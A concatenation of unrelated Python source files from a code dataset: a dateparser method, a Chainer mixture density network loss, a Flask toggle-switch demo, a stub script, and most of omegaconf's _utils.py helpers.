:raises: ValueError - Unknown Language
.. note:: *Period* values can be a 'day' (default), 'week', 'month', 'year'.
*Period* represents the granularity of date parsed from the given string.
In the example below, since no day information is present, the day is assumed to be current
day ``16`` from *current date* (which is June 16, 2015, at the moment of writing this).
Hence, the level of precision is ``month``:
>>> DateDataParser().get_date_data(u'March 2015')
{'date_obj': datetime.datetime(2015, 3, 16, 0, 0), 'period': u'month'}
Similarly, for date strings with no day and month information present, level of precision
is ``year`` and day ``16`` and month ``6`` are from *current_date*.
>>> DateDataParser().get_date_data(u'2014')
{'date_obj': datetime.datetime(2014, 6, 16, 0, 0), 'period': u'year'}
Dates with time zone indications or UTC offsets are returned in UTC time unless
specified using `Settings`_.
>>> DateDataParser().get_date_data(u'23 March 2000, 1:21 PM CET')
{'date_obj': datetime.datetime(2000, 3, 23, 14, 21), 'period': 'day'}
"""
if not(isinstance(date_string, six.text_type) or isinstance(date_string, six.string_types)):
raise TypeError('Input type must be str or unicode')
res = parse_with_formats(date_string, date_formats or [], self._settings)
if res['date_obj']:
return res
if self._settings.NORMALIZE:
date_string = normalize_unicode(date_string)
date_string = sanitize_date(date_string)
for language in self.language_detector.iterate_applicable_languages(
date_string, modify=True, settings=self._settings):
parsed_date = _DateLanguageParser.parse(
language, date_string, date_formats, settings=self._settings)
if parsed_date:
parsed_date['language'] = language.shortname
return parsed_date
else:
return {'date_obj': None, 'period': 'day', 'language': None}
def get_date_tuple(self, *args, **kwargs):
date_tuple = collections.namedtuple('DateData', 'date_obj period language')
date_data = self.get_date_data(*args, **kwargs)
return date_tuple(**date_data)
@classmethod
def _get_language_loader(cls):
if not cls.language_loader:
cls.language_loader = LanguageDataLoader()
return cls.language_loader
| 2.03125 | 2 |
src/models/functions/connection/mixture_density_network.py | kristofbc/handwriting-synthesis | 0 | 3327 | import chainer
import chainer.functions
from chainer.utils import type_check
from chainer import cuda
from chainer import function
import numpy as np
#from chainer import function_node
from utils import clip_grad
#class MixtureDensityNetworkFunction(function_node.FunctionNode):
class MixtureDensityNetworkFunction(function.Function):
def check_type_forward(self, in_types):
type_check.expect(in_types.size() == 8)
x_type, eos_input_type, pi_input_type, mu_x1_input_type, mu_x2_input_type, s_x1_input_type, s_x2_input_type, rho_input_type = in_types
type_check.expect(
x_type.dtype.kind == 'f',
eos_input_type.dtype.kind == 'f',
pi_input_type.dtype.kind == 'f',
mu_x1_input_type.dtype.kind == 'f',
mu_x2_input_type.dtype.kind == 'f',
s_x1_input_type.dtype.kind == 'f',
s_x2_input_type.dtype.kind == 'f',
rho_input_type.dtype.kind == 'f',
x_type.ndim >= 2,
eos_input_type.ndim >= 2,
x_type.shape[0] == eos_input_type.shape[0],
x_type.shape[0] == pi_input_type.shape[0],
x_type.shape[0] == mu_x1_input_type.shape[0],
x_type.shape[0] == mu_x2_input_type.shape[0],
x_type.shape[0] == s_x1_input_type.shape[0],
x_type.shape[0] == s_x2_input_type.shape[0],
x_type.shape[0] == rho_input_type.shape[0],
pi_input_type.shape[1] == mu_x1_input_type.shape[1],
mu_x1_input_type.shape[1] == mu_x2_input_type.shape[1],
mu_x2_input_type.shape[1] == s_x1_input_type.shape[1],
s_x1_input_type.shape[1] == s_x2_input_type.shape[1],
s_x2_input_type.shape[1] == rho_input_type.shape[1]
)
pass
def forward(self, inputs):
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
#self.retain_inputs(range(len(inputs))) # Retain everything for backward
if not type_check.same_types(*inputs):
raise ValueError("numpy and cupy must not be used together\n"
"type(x): {0}, type(eos_input): {1}, type(pi_input): {2}"
"type(mu_x1_input): {3}, type(mu_x2_input): {4}, type(s_x1_input): {5}"
"type(s_x2_input): {6}, type(rho_input): {7}"
.format(type(x), type(eos_input), type(pi_input),
type(mu_x1_input), type(mu_x2_input), type(s_x1_input),
type(s_x2_input), type(rho_input)))
xp = cuda.get_array_module(*inputs)
def softmax(x):
shiftx = x - x.max()
exps = xp.exp(shiftx)
return exps / xp.sum(exps, 1, keepdims=True)
# Get MDN coeff. Eq #18 to #22
z_eos = 1. / (1. + xp.exp(eos_input)) # F.sigmoid. NOTE: usually sigmoid is 1/(1+e^-x). Here 'x' is >0!
z_s_x1 = xp.exp(s_x1_input) + 1e-10
z_s_x2 = xp.exp(s_x2_input) + 1e-10
z_rho = xp.tanh(rho_input)
z_pi = softmax(pi_input)
#z_pi = xp.exp(pi_input)
#z_pi = z_pi / xp.sum(z_pi, 1, keepdims=True)
z_mu_x1 = mu_x1_input
z_mu_x2 = mu_x2_input
# The MDN coeff are saved, because they're reused in the backward phase
self.z_eos = z_eos
self.z_s_x1 = z_s_x1
self.z_s_x2 = z_s_x2
self.z_rho = z_rho
self.z_pi = z_pi
self.z_mu_x1 = z_mu_x1
self.z_mu_x2 = z_mu_x2
# Compute the loss.
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
# Z variable. Eq. 25
norm_x1 = x1 - z_mu_x1
norm_x2 = x2 - z_mu_x2
z_left = (xp.square(norm_x1)/xp.square(z_s_x1)) + (xp.square(norm_x2)/xp.square(z_s_x2))
z_right = (2.*z_rho*norm_x1*norm_x2)/(z_s_x1*z_s_x2)
z = z_left - z_right
self.z = z
# Normal function. Eq. 24.
inv_ro = 1. - xp.square(z_rho) + 1e-10
n_left = 2. * np.pi * z_s_x1 * z_s_x2 * xp.sqrt(inv_ro) + 1e-10 # + 1e-10 for computational stability
n_right = xp.exp(-z / (2. * inv_ro))
n = n_right / n_left
# Gamma parameter (for the backward phase). Eq. 28-29
gamma = z_pi * n
gamma = gamma / (xp.sum(gamma, 1, keepdims=True) + 1e-10) # sum + 1e-10 for computational stability, != nan!
self.gamma = gamma
# Sequence loss. Eq. 26
loss_y = z_pi * n
loss_y = xp.sum(loss_y, 1, keepdims=True) + 1e-10 # + 1e-10 for computational stability, != nan
#epsilon = xp.full(loss_y.shape, 1e-10, dtype=xp.float32)
#loss_y = xp.maximum(loss_y, epsilon) # Because at the begining loss_y is exactly 0 sometime
loss_y = -xp.log(loss_y + 1e-10)
#loss_x = z_eos * x3 + (1. - z_eos) * (1. - x3)
#loss_x = -xp.log(loss_x)
loss_x = -x3 * xp.log(z_eos + 1e-10) - (1. - x3) * xp.log(1. - z_eos + 1e-10)
loss = loss_y + loss_x
# Mask guard to check if x3 == 2 (added padding)
idx_mask = xp.where(x3==2)[0]
mask = xp.ones_like(x3)
mask[idx_mask, 0] = 0.
self.mask = mask
loss *= mask
return loss, x, z_eos, z_pi, z_mu_x1, z_mu_x2, z_s_x1, z_s_x2, z_rho,
def backward(self, inputs, grad_outputs):
xp = cuda.get_array_module(*inputs)
#x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = self.get_retained_inputs()
x, eos_input, pi_input, mu_x1_input, mu_x2_input, s_x1_input, s_x2_input, rho_input = inputs
# MDN coeff to differentiate
g_eos = xp.empty_like(eos_input)
g_s_x1 = xp.empty_like(s_x1_input)
g_s_x2 = xp.empty_like(s_x2_input)
g_rho = xp.empty_like(rho_input)
g_pi = xp.empty_like(pi_input)
g_mu_x1 = xp.empty_like(mu_x1_input)
g_mu_x2 = xp.empty_like(mu_x2_input)
# Compute the gradient
x1 = x[:, 0:1]
x2 = x[:, 1:2]
x3 = x[:, 2:3]
#if xp == np:
# From eq. 27 to 37
C = 1. / (1. - self.z_rho*self.z_rho + 1e-10)
d_norm_x1 = (x1 - self.z_mu_x1) / self.z_s_x1
d_norm_x2 = (x2 - self.z_mu_x2) / self.z_s_x2
d_rho_norm_x1 = self.z_rho * d_norm_x1
d_rho_norm_x2 = self.z_rho * d_norm_x2
g_eos = (x3 - self.z_eos) * self.mask
g_pi = (self.z_pi - self.gamma) * self.mask
g_mu_x1 = - self.gamma * ((C/self.z_s_x1) * (d_norm_x1 - d_rho_norm_x2)) * self.mask
g_mu_x2 = - self.gamma * ((C/self.z_s_x2) * (d_norm_x2 - d_rho_norm_x1)) * self.mask
g_s_x1 = - self.gamma * ((C*d_norm_x1) * (d_norm_x1 - d_rho_norm_x2) - 1.) * self.mask
g_s_x2 = - self.gamma * ((C*d_norm_x2) * (d_norm_x2 - d_rho_norm_x1) - 1.) * self.mask
g_rho = - self.gamma * (d_norm_x1*d_norm_x2 + self.z_rho*(1. - C * self.z)) * self.mask
#else:
# g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho = cuda.elementwise(
# 'T x1, T x2, T eos_input, T pi_input, T mu_x1_input, T mu_x2_input, T s_x1_input, T s_x2_input, T rho_input',
# 'T g_eos, T g_pi, T g_mu_x1, T g_mu_x2, T g_s_x1, T g_s_x2, T g_rho',
# )
# Add grad_clipping here if it explodes P.23
th_min = -100.0
th_max = 100.0
g_eos = clip_grad(g_eos, th_min, th_max, xp)
g_pi = clip_grad(g_pi, th_min, th_max, xp)
g_mu_x1 = clip_grad(g_mu_x1, th_min, th_max, xp)
g_mu_x2 = clip_grad(g_mu_x2, th_min, th_max, xp)
g_s_x1 = clip_grad(g_s_x1, th_min, th_max, xp)
g_s_x2 = clip_grad(g_s_x2, th_min, th_max, xp)
g_rho = clip_grad(g_rho, th_min, th_max, xp)
return None, g_eos, g_pi, g_mu_x1, g_mu_x2, g_s_x1, g_s_x2, g_rho,
def mixture_density_network(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho):
""" Mixture Density Network
Output the coefficient params
Args:
x (Variable): Tensor containing the position [x1, x2, x3] to predict
eos (Variable): End-of-stroke prediction
pi (Variable): mixture components
mu_x1 (Variable): mean of x1
mu_x2 (Variable): mean of x2
s_x1 (Variable): variance of x1
s_x2 (Variable): variance of x2
rho (Variable): correlation parameter
Returns:
loss (Variable)
y (Variable)
eos (Variable)
pi (Variable)
mu_x1 (Variable)
mu_x2 (Variable)
s_x1 (Variable)
s_x2 (Variable)
rho (Variable)
"""
return MixtureDensityNetworkFunction()(x, eos, pi, mu_x1, mu_x2, s_x1, s_x2, rho)
| 2.1875 | 2 |
flask__webservers/bootstrap_4__toggle_switch__examples/main.py | DazEB2/SimplePyScripts | 0 | 3328 | <reponame>DazEB2/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
# SOURCE: https://github.com/twbs/bootstrap
# SOURCE: https://github.com/gitbrent/bootstrap4-toggle
# SOURCE: https://gitbrent.github.io/bootstrap4-toggle/
from flask import Flask, render_template
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
@app.route("/")
def index():
return render_template('index.html')
if __name__ == '__main__':
app.debug = True
# Localhost
# port=0 -- random free port
# app.run(port=0)
app.run(
port=5000,
# :param threaded: should the process handle each request in a separate
# thread?
# :param processes: if greater than 1 then handle each request in a new process
# up to this maximum number of concurrent processes.
threaded=True,
)
# # Public IP
# app.run(host='0.0.0.0')
| 2.40625 | 2 |
dev/phonts/visualization/phonts.py | eragasa/pypospack | 4 | 3329 | <gh_stars>1-10
import pypospack.io.phonts as phonts
# <---- additional classes and functions in which to add top
# <---- pypospack.io.phonts
if __name__ == "__main__":
| 1.296875 | 1 |
omegaconf/_utils.py | sugatoray/omegaconf | 1,091 | 3330 | <reponame>sugatoray/omegaconf<gh_stars>1000+
import copy
import os
import re
import string
import sys
import warnings
from contextlib import contextmanager
from enum import Enum
from textwrap import dedent
from typing import (
Any,
Dict,
Iterator,
List,
Optional,
Tuple,
Type,
Union,
get_type_hints,
)
import yaml
from .errors import (
ConfigIndexError,
ConfigTypeError,
ConfigValueError,
GrammarParseError,
OmegaConfBaseException,
ValidationError,
)
from .grammar_parser import SIMPLE_INTERPOLATION_PATTERN, parse
try:
import dataclasses
except ImportError: # pragma: no cover
dataclasses = None # type: ignore # pragma: no cover
try:
import attr
except ImportError: # pragma: no cover
attr = None # type: ignore # pragma: no cover
# Regexprs to match key paths like: a.b, a[b], ..a[c].d, etc.
# We begin by matching the head (in these examples: a, a, ..a).
# This can be read as "dots followed by any character but `.` or `[`"
# Note that a key starting with brackets, like [a], is purposedly *not*
# matched here and will instead be handled in the next regex below (this
# is to keep this regex simple).
KEY_PATH_HEAD = re.compile(r"(\.)*[^.[]*")
# Then we match other keys. The following expression matches one key and can
# be read as a choice between two syntaxes:
# - `.` followed by anything except `.` or `[` (ex: .b, .d)
# - `[` followed by anything then `]` (ex: [b], [c])
KEY_PATH_OTHER = re.compile(r"\.([^.[]*)|\[(.*?)\]")
# source: https://yaml.org/type/bool.html
YAML_BOOL_TYPES = [
"y",
"Y",
"yes",
"Yes",
"YES",
"n",
"N",
"no",
"No",
"NO",
"true",
"True",
"TRUE",
"false",
"False",
"FALSE",
"on",
"On",
"ON",
"off",
"Off",
"OFF",
]
class Marker:
def __init__(self, desc: str):
self.desc = desc
def __repr__(self) -> str:
return self.desc
# To be used as default value when `None` is not an option.
_DEFAULT_MARKER_: Any = Marker("_DEFAULT_MARKER_")
class OmegaConfDumper(yaml.Dumper): # type: ignore
str_representer_added = False
@staticmethod
def str_representer(dumper: yaml.Dumper, data: str) -> yaml.ScalarNode:
with_quotes = yaml_is_bool(data) or is_int(data) or is_float(data)
return dumper.represent_scalar(
yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG,
data,
style=("'" if with_quotes else None),
)
def get_omega_conf_dumper() -> Type[OmegaConfDumper]:
if not OmegaConfDumper.str_representer_added:
OmegaConfDumper.add_representer(str, OmegaConfDumper.str_representer)
OmegaConfDumper.str_representer_added = True
return OmegaConfDumper
def yaml_is_bool(b: str) -> bool:
return b in YAML_BOOL_TYPES
def get_yaml_loader() -> Any:
class OmegaConfLoader(yaml.SafeLoader): # type: ignore
def construct_mapping(self, node: yaml.Node, deep: bool = False) -> Any:
keys = set()
for key_node, value_node in node.value:
if key_node.tag != yaml.resolver.BaseResolver.DEFAULT_SCALAR_TAG:
continue
if key_node.value in keys:
raise yaml.constructor.ConstructorError(
"while constructing a mapping",
node.start_mark,
f"found duplicate key {key_node.value}",
key_node.start_mark,
)
keys.add(key_node.value)
return super().construct_mapping(node, deep=deep)
loader = OmegaConfLoader
loader.add_implicit_resolver(
"tag:yaml.org,2002:float",
re.compile(
"""^(?:
[-+]?(?:[0-9][0-9_]*)\\.[0-9_]*(?:[eE][-+]?[0-9]+)?
|[-+]?(?:[0-9][0-9_]*)(?:[eE][-+]?[0-9]+)
|\\.[0-9_]+(?:[eE][-+][0-9]+)?
|[-+]?[0-9][0-9_]*(?::[0-5]?[0-9])+\\.[0-9_]*
|[-+]?\\.(?:inf|Inf|INF)
|\\.(?:nan|NaN|NAN))$""",
re.X,
),
list("-+0123456789."),
)
loader.yaml_implicit_resolvers = {
key: [
(tag, regexp)
for tag, regexp in resolvers
if tag != "tag:yaml.org,2002:timestamp"
]
for key, resolvers in loader.yaml_implicit_resolvers.items()
}
return loader
def _get_class(path: str) -> type:
from importlib import import_module
module_path, _, class_name = path.rpartition(".")
mod = import_module(module_path)
try:
klass: type = getattr(mod, class_name)
except AttributeError:
raise ImportError(f"Class {class_name} is not in module {module_path}")
return klass
def _is_union(type_: Any) -> bool:
return getattr(type_, "__origin__", None) is Union
def _resolve_optional(type_: Any) -> Tuple[bool, Any]:
"""Check whether `type_` is equivalent to `typing.Optional[T]` for some T."""
if getattr(type_, "__origin__", None) is Union:
args = type_.__args__
if len(args) == 2 and args[1] == type(None): # noqa E721
return True, args[0]
if type_ is Any:
return True, Any
return False, type_
def _is_optional(obj: Any, key: Optional[Union[int, str]] = None) -> bool:
"""Check `obj` metadata to see if the given node is optional."""
from .base import Container, Node
if key is not None:
assert isinstance(obj, Container)
obj = obj._get_node(key)
if isinstance(obj, Node):
return obj._is_optional()
else:
# In case `obj` is not a Node, treat it as optional by default.
# This is used in `ListConfig.append` and `ListConfig.insert`
# where the appended/inserted value might or might not be a Node.
return True
def _resolve_forward(type_: Type[Any], module: str) -> Type[Any]:
import typing # lgtm [py/import-and-import-from]
forward = typing.ForwardRef if hasattr(typing, "ForwardRef") else typing._ForwardRef # type: ignore
if type(type_) is forward:
return _get_class(f"{module}.{type_.__forward_arg__}")
else:
if is_dict_annotation(type_):
kt, vt = get_dict_key_value_types(type_)
if kt is not None:
kt = _resolve_forward(kt, module=module)
if vt is not None:
vt = _resolve_forward(vt, module=module)
return Dict[kt, vt] # type: ignore
if is_list_annotation(type_):
et = get_list_element_type(type_)
if et is not None:
et = _resolve_forward(et, module=module)
return List[et] # type: ignore
return type_
def extract_dict_subclass_data(obj: Any, parent: Any) -> Optional[Dict[str, Any]]:
"""Check if obj is an instance of a subclass of Dict. If so, extract the Dict keys/values."""
from omegaconf.omegaconf import _maybe_wrap
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
subclasses_dict = is_dict_subclass(obj_type)
if subclasses_dict:
warnings.warn(
f"Class `{obj_type.__name__}` subclasses `Dict`."
+ " Subclassing `Dict` in Structured Config classes is deprecated,"
+ " see github.com/omry/omegaconf/issues/663",
UserWarning,
stacklevel=9,
)
if is_type:
return None
elif subclasses_dict:
dict_subclass_data = {}
key_type, element_type = get_dict_key_value_types(obj_type)
for name, value in obj.items():
is_optional, type_ = _resolve_optional(element_type)
type_ = _resolve_forward(type_, obj.__module__)
try:
dict_subclass_data[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=parent,
)
except ValidationError as ex:
format_and_raise(
node=None, key=name, value=value, cause=ex, msg=str(ex)
)
return dict_subclass_data
else:
return None
def get_attr_class_field_names(obj: Any) -> List[str]:
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
return list(attr.fields_dict(obj_type))
def get_attr_data(obj: Any, allow_objects: Optional[bool] = None) -> Dict[str, Any]:
from omegaconf.omegaconf import OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
from omegaconf import MISSING
d = {}
is_type = isinstance(obj, type)
obj_type = obj if is_type else type(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
for name, attrib in attr.fields_dict(obj_type).items():
is_optional, type_ = _resolve_optional(attrib.type)
type_ = _resolve_forward(type_, obj.__module__)
if not is_type:
value = getattr(obj, name)
else:
value = attrib.default
if value == attr.NOTHING:
value = MISSING
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def get_dataclass_field_names(obj: Any) -> List[str]:
return [field.name for field in dataclasses.fields(obj)]
def get_dataclass_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
from omegaconf.omegaconf import MISSING, OmegaConf, _maybe_wrap
flags = {"allow_objects": allow_objects} if allow_objects is not None else {}
d = {}
obj_type = get_type_of(obj)
dummy_parent = OmegaConf.create({}, flags=flags)
dummy_parent._metadata.object_type = obj_type
resolved_hints = get_type_hints(obj_type)
for field in dataclasses.fields(obj):
name = field.name
is_optional, type_ = _resolve_optional(resolved_hints[field.name])
type_ = _resolve_forward(type_, obj.__module__)
if hasattr(obj, name):
value = getattr(obj, name)
if value == dataclasses.MISSING:
value = MISSING
else:
if field.default_factory == dataclasses.MISSING: # type: ignore
value = MISSING
else:
value = field.default_factory() # type: ignore
if _is_union(type_):
e = ConfigValueError(
f"Union types are not supported:\n{name}: {type_str(type_)}"
)
format_and_raise(node=None, key=None, value=value, cause=e, msg=str(e))
try:
d[name] = _maybe_wrap(
ref_type=type_,
is_optional=is_optional,
key=name,
value=value,
parent=dummy_parent,
)
except (ValidationError, GrammarParseError) as ex:
format_and_raise(
node=dummy_parent, key=name, value=value, cause=ex, msg=str(ex)
)
d[name]._set_parent(None)
dict_subclass_data = extract_dict_subclass_data(obj=obj, parent=dummy_parent)
if dict_subclass_data is not None:
d.update(dict_subclass_data)
return d
def is_dataclass(obj: Any) -> bool:
from omegaconf.base import Node
if dataclasses is None or isinstance(obj, Node):
return False
return dataclasses.is_dataclass(obj)
def is_attr_class(obj: Any) -> bool:
from omegaconf.base import Node
if attr is None or isinstance(obj, Node):
return False
return attr.has(obj)
def is_structured_config(obj: Any) -> bool:
return is_attr_class(obj) or is_dataclass(obj)
def is_dataclass_frozen(type_: Any) -> bool:
return type_.__dataclass_params__.frozen # type: ignore
def is_attr_frozen(type_: type) -> bool:
# This is very hacky and probably fragile as well.
# Unfortunately currently there isn't an official API in attr that can detect that.
# noinspection PyProtectedMember
return type_.__setattr__ == attr._make._frozen_setattrs # type: ignore
def get_type_of(class_or_object: Any) -> Type[Any]:
type_ = class_or_object
if not isinstance(type_, type):
type_ = type(class_or_object)
assert isinstance(type_, type)
return type_
def is_structured_config_frozen(obj: Any) -> bool:
type_ = get_type_of(obj)
if is_dataclass(type_):
return is_dataclass_frozen(type_)
if is_attr_class(type_):
return is_attr_frozen(type_)
return False
def get_structured_config_field_names(obj: Any) -> List[str]:
if is_dataclass(obj):
return get_dataclass_field_names(obj)
elif is_attr_class(obj):
return get_attr_class_field_names(obj)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
def get_structured_config_data(
obj: Any, allow_objects: Optional[bool] = None
) -> Dict[str, Any]:
if is_dataclass(obj):
return get_dataclass_data(obj, allow_objects=allow_objects)
elif is_attr_class(obj):
return get_attr_data(obj, allow_objects=allow_objects)
else:
raise ValueError(f"Unsupported type: {type(obj).__name__}")
class ValueKind(Enum):
VALUE = 0
MANDATORY_MISSING = 1
INTERPOLATION = 2
def _is_missing_value(value: Any) -> bool:
from omegaconf import Node
if isinstance(value, Node):
value = value._value()
return _is_missing_literal(value)
def _is_missing_literal(value: Any) -> bool:
# Uses literal '???' instead of the MISSING const for performance reasons.
return isinstance(value, str) and value == "???"
def _is_none(
value: Any, resolve: bool = False, throw_on_resolution_failure: bool = True
) -> bool:
from omegaconf import Node
if not isinstance(value, Node):
return value is None
if resolve:
value = value._maybe_dereference_node(
throw_on_resolution_failure=throw_on_resolution_failure
)
if not throw_on_resolution_failure and value is None:
# Resolution failure: consider that it is *not* None.
return False
assert isinstance(value, Node)
return value._is_none()
def get_value_kind(
value: Any, strict_interpolation_validation: bool = False
) -> ValueKind:
"""
Determine the kind of a value
Examples:
VALUE: "10", "20", True
MANDATORY_MISSING: "???"
INTERPOLATION: "${foo.bar}", "${foo.${bar}}", "${foo:bar}", "[${foo}, ${bar}]",
"ftp://${host}/path", "${foo:${bar}, [true], {'baz': ${baz}}}"
:param value: Input to classify.
:param strict_interpolation_validation: If `True`, then when `value` is a string
containing "${", it is parsed to validate the interpolation syntax. If `False`,
this parsing step is skipped: this is more efficient, but will not detect errors.
"""
if _is_missing_value(value):
return ValueKind.MANDATORY_MISSING
value = _get_value(value)
# We identify potential interpolations by the presence of "${" in the string.
# Note that escaped interpolations (ex: "esc: \${bar}") are identified as
# interpolations: this is intended, since they must be processed as interpolations
# for the string to be properly un-escaped.
# Keep in mind that invalid interpolations will only be detected when
# `strict_interpolation_validation` is True.
if isinstance(value, str) and "${" in value:
if strict_interpolation_validation:
# First try the cheap regex matching that detects common interpolations.
if SIMPLE_INTERPOLATION_PATTERN.match(value) is None:
# If no match, do the more expensive grammar parsing to detect errors.
parse(value)
return ValueKind.INTERPOLATION
else:
return ValueKind.VALUE
# DEPRECATED: remove in 2.2
def is_bool(st: str) -> bool:
st = str.lower(st)
return st == "true" or st == "false"
def is_float(st: str) -> bool:
try:
float(st)
return True
except ValueError:
return False
def is_int(st: str) -> bool:
try:
int(st)
return True
except ValueError:
return False
# DEPRECATED: remove in 2.2
def decode_primitive(s: str) -> Any:
if is_bool(s):
return str.lower(s) == "true"
if is_int(s):
return int(s)
if is_float(s):
return float(s)
return s
def is_primitive_list(obj: Any) -> bool:
from .base import Container
return not isinstance(obj, Container) and isinstance(obj, (list, tuple))
def is_primitive_dict(obj: Any) -> bool:
t = get_type_of(obj)
return t is dict
def is_dict_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Dict or type_ is Dict # pragma: no cover
else: # pragma: no cover
# type_dict is a bit hard to detect.
# this support is tentative, if it eventually causes issues in other areas it may be dropped.
typed_dict = hasattr(type_, "__base__") and type_.__base__ == dict
return origin is dict or typed_dict
def is_list_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is List or type_ is List # pragma: no cover
else:
return origin is list # pragma: no cover
def is_tuple_annotation(type_: Any) -> bool:
origin = getattr(type_, "__origin__", None)
if sys.version_info < (3, 7, 0):
return origin is Tuple or type_ is Tuple # pragma: no cover
else:
return origin is tuple # pragma: no cover
def is_dict_subclass(type_: Any) -> bool:
return type_ is not None and isinstance(type_, type) and issubclass(type_, Dict)
def is_dict(obj: Any) -> bool:
return is_primitive_dict(obj) or is_dict_annotation(obj) or is_dict_subclass(obj)
def is_primitive_container(obj: Any) -> bool:
return is_primitive_list(obj) or is_primitive_dict(obj)
def get_list_element_type(ref_type: Optional[Type[Any]]) -> Any:
args = getattr(ref_type, "__args__", None)
if ref_type is not List and args is not None and args[0]:
element_type = args[0]
else:
element_type = Any
return element_type
def get_dict_key_value_types(ref_type: Any) -> Tuple[Any, Any]:
args = getattr(ref_type, "__args__", None)
if args is None:
bases = getattr(ref_type, "__orig_bases__", None)
if bases is not None and len(bases) > 0:
args = getattr(bases[0], "__args__", None)
key_type: Any
element_type: Any
if ref_type is None or ref_type == Dict:
key_type = Any
element_type = Any
else:
if args is not None:
key_type = args[0]
element_type = args[1]
else:
key_type = Any
element_type = Any
return key_type, element_type
def valid_value_annotation_type(type_: Any) -> bool:
return type_ is Any or is_primitive_type(type_) or is_structured_config(type_)
def _valid_dict_key_annotation_type(type_: Any) -> bool:
from omegaconf import DictKeyType
return type_ is None or type_ is Any or issubclass(type_, DictKeyType.__args__) # type: ignore
def is_primitive_type(type_: Any) -> bool:
type_ = get_type_of(type_)
return issubclass(type_, Enum) or type_ in (int, float, bool, str, type(None))
def _is_interpolation(v: Any, strict_interpolation_validation: bool = False) -> bool:
if isinstance(v, str):
ret = (
get_value_kind(v, strict_interpolation_validation)
== ValueKind.INTERPOLATION
)
assert isinstance(ret, bool)
return ret
return False
def _get_value(value: Any) -> Any:
from .base import Container
from .nodes import ValueNode
if isinstance(value, ValueNode):
return value._value()
elif isinstance(value, Container):
boxed = value._value()
if boxed is None or _is_missing_literal(boxed) or _is_interpolation(boxed):
return boxed
# return primitives and regular OmegaConf Containers as is
return value
def get_ref_type(obj: Any, key: Any = None) -> Optional[Type[Any]]:
from omegaconf import Container, Node
if isinstance(obj, Container):
if key is not None:
obj = obj._get_node(key)
else:
if key is not None:
raise ValueError("Key must only be provided when obj is a container")
if isinstance(obj, Node):
ref_type = obj._metadata.ref_type
if obj._is_optional() and ref_type is not Any:
return Optional[ref_type] # type: ignore
else:
return ref_type
else:
return Any # type: ignore
def _raise(ex: Exception, cause: Exception) -> None:
# Set the environment variable OC_CAUSE=1 to get a stacktrace that includes the
# causing exception.
env_var = os.environ["OC_CAUSE"] if "OC_CAUSE" in os.environ else None
debugging = sys.gettrace() is not None
full_backtrace = (debugging and not env_var == "0") or (env_var == "1")
if full_backtrace:
ex.__cause__ = cause
else:
ex.__cause__ = None
raise ex.with_traceback(sys.exc_info()[2]) # set end OC_CAUSE=1 for full backtrace
def format_and_raise(
node: Any,
key: Any,
value: Any,
msg: str,
cause: Exception,
type_override: Any = None,
) -> None:
from omegaconf import OmegaConf
from omegaconf.base import Node
if isinstance(cause, AssertionError):
raise
if isinstance(cause, OmegaConfBaseException) and cause._initialized:
ex = cause
if type_override is not None:
ex = type_override(str(cause))
ex.__dict__ = copy.deepcopy(cause.__dict__)
_raise(ex, cause)
object_type: Optional[Type[Any]]
object_type_str: Optional[str] = None
ref_type: Optional[Type[Any]]
ref_type_str: Optional[str]
child_node: Optional[Node] = None
if node is None:
full_key = key if key is not None else ""
object_type = None
ref_type = None
ref_type_str = None
else:
if key is not None and not node._is_none():
child_node = node._get_node(key, validate_access=False)
try:
full_key = node._get_full_key(key=key)
except Exception as exc:
# Since we are handling an exception, raising a different one here would
# be misleading. Instead, we display it in the key.
full_key = f"<unresolvable due to {type(exc).__name__}: {exc}>"
object_type = OmegaConf.get_type(node)
object_type_str = type_str(object_type)
ref_type = get_ref_type(node)
ref_type_str = type_str(ref_type)
msg = string.Template(msg).safe_substitute(
REF_TYPE=ref_type_str,
OBJECT_TYPE=object_type_str,
KEY=key,
FULL_KEY=full_key,
VALUE=value,
VALUE_TYPE=type_str(type(value), include_module_name=True),
KEY_TYPE=f"{type(key).__name__}",
)
if ref_type not in (None, Any):
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
reference_type=$REF_TYPE
object_type=$OBJECT_TYPE"""
)
else:
template = dedent(
"""\
$MSG
full_key: $FULL_KEY
object_type=$OBJECT_TYPE"""
)
s = string.Template(template=template)
message = s.substitute(
REF_TYPE=ref_type_str, OBJECT_TYPE=object_type_str, MSG=msg, FULL_KEY=full_key
)
exception_type = type(cause) if type_override is None else type_override
if exception_type == TypeError:
exception_type = ConfigTypeError
elif exception_type == IndexError:
exception_type = ConfigIndexError
ex = exception_type(f"{message}")
if issubclass(exception_type, OmegaConfBaseException):
ex._initialized = True
ex.msg = message
ex.parent_node = node
ex.child_node = child_node
ex.key = key
ex.full_key = full_key
